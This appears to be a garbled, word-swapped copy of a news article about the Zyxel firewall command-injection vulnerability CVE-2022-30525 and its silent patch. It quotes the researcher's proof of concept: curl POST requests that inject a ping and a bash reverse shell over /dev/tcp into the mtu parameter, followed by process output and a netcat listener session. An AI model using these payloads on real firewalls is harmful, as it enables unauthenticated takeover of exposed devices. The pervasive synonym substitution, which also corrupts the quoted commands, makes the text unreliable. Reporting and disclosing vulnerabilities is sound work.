Zyxel silently patches command-injection vulnerability with 9.8 severity score


Zyxel silently patches command-injection vulnerability with 9.8 severity rating


{Hardware} producer Zyxel quietly launched an replace solving a important vulnerability that provides hackers the power to keep watch over tens of 1000’s of firewall units remotely.

The vulnerability, which permits far off command injection with out a authentication required, carries a severity score of 9.8 out of a imaginable 10. It’s simple to take advantage of by way of sending easy HTTP or HTTPS requests to affected units. The requests permit hackers to ship instructions or open a internet shell interface that permits hackers to care for privileged get admission to over the years.

Prime-value, simple to weaponize, calls for no authentication

The vulnerability impacts a line of firewalls that supply a function referred to as zero-touch provisioning. Zyxel markets the units to be used in small department and company headquarter deployments. The units carry out VPN connectivity, SSL inspection, internet filtering, intrusion coverage, and electronic mail safety and supply as much as 5Gbps throughput in the course of the firewall. The Shodan tool seek provider displays greater than 16,000 affected units are uncovered to the Web.

The particular units affected are:

Affected Type Affected Firmware Model
USG FLEX 100, 100W, 200, 500, 700 ZLD5.00 through ZLD5.21 Patch 1
USG20-VPN, USG20W-VPN ZLD5.10 through ZLD5.21 Patch 1
ATP 100, 200, 500, 700, 800 ZLD5.10 through ZLD5.21 Patch 1

The vulnerability is tracked as CVE-2022-30525. Rapid7, the safety company that found out it and privately reported it to Zyxel, mentioned that the VPN sequence of the units additionally helps ZTP, however they’re no longer inclined as a result of they don’t come with different required capability. In an advisory revealed Thursday, Rapid7 researcher Jake Baines wrote:

The affected fashions are susceptible to unauthenticated and far off command injection by the use of the executive HTTP interface. Instructions are carried out because the no one consumer. This vulnerability is exploited in the course of the /ztp/cgi-bin/handler URI and is the results of passing unsanitized attacker enter into the os.gadget manner in lib_wan_settings.py. The inclined capability is invoked in affiliation with the setWanPortSt command. An attacker can inject arbitrary instructions into the mtu or the information parameter.

Underneath are examples of (1) curl that reasons the firewall to execute a ping to IP cope with, adopted by way of (2) the powershell output of the effects, (3) the spawning of a opposite shell and (4) issues a hacker can do with the opposite shell:

    1. curl -v --insecure -X POST -H "Content material-Kind: software/json" -d
      :"1","vlanid":"5","mtu":"; ping;","information":"hello"}'
    2. no one   11040  0.0  0.2  21040  5152 ?        S    Apr10   0:00  _ /usr/native/apache/bin/httpd -f /usr/native/zyxel-gui/httpd.conf -k sleek -DSSL
      no one   16052 56.4  0.6  18104 11224 ?        S    06:16   0:02  |   _ /usr/bin/python /usr/native/zyxel-gui/htdocs/ztp/cgi-bin/handler.py
      no one   16055  0.0  0.0   3568  1492 ?        S    06:16   0:00  |       _ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping; 5 >/dev/null 2>&1
      no one   16057  0.0  0.0   2152   564 ?        S    06:16   0:00  |           _ ping
    3. curl -v --insecure -X POST -H "Content material-Kind: software/json" -d '
      "1","vlanid":"5","mtu":"; bash -c "exec bash -i &>/dev/tcp/ <&1;";","information":"hello"}'
    4. albinolobster@ubuntu:~$ nc -lvnp 1270
      Listening on 1270
      Connection won on 37882
      bash: can't set terminal procedure workforce (11037): Beside the point ioctl for tool
      bash: no task keep watch over on this shell
      bash-5.1$ identification
      uid=99(no one) gid=10003(shadowr) teams=99,10003(shadowr)
      bash-5.1$ uname -a
      uname -a
      Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux

Rapid7 has advanced a module for the Metasploit exploit framework right here that automates the exploitation procedure.

Baines mentioned that Rapid7 notified Zyxel of the vulnerability on April 13 and that the 2 events agreed to offer a coordinated disclosure, together with the repair, on June 21. The researcher went on to mention that unbeknownst to Rapid7, the {hardware} producer launched a firmware replace on April 28 that quietly mounted the vulnerability. Zyxel most effective got the CVE quantity on Tuesday, after Rapid7 requested concerning the silent patch, and revealed an advisory on Thursday.

Consistent with AttackerKB, a useful resource on safety vulnerabilities, CVE-2022-30525 is of prime price to risk actors as it’s simple to weaponize, calls for no authentication, and will also be exploited within the default setup of inclined units. Rapid7 representatives weren’t to be had to respond to elementary questions concerning the accuracy of that overview.

Directors will have to manually observe the patch until they have got modified default settings to permit automated updating. Early indications are that the patch hasn’t been broadly deployed, as a Shodan question for simply some of the inclined firewalls, the ATP200, confirmed that most effective about 25 p.c of uncovered units had been operating the newest firmware.

Vulnerabilities affecting firewalls will also be particularly critical as a result of they sit down on the outer fringe of networks the place incoming and outgoing site visitors flows. Many firewalls too can learn information ahead of it’s encrypted. Directors who oversee networks that use those affected units will have to prioritize investigating their publicity to this vulnerability and patch accordingly.



Please enter your comment!
Please enter your name here

Share post:


More like this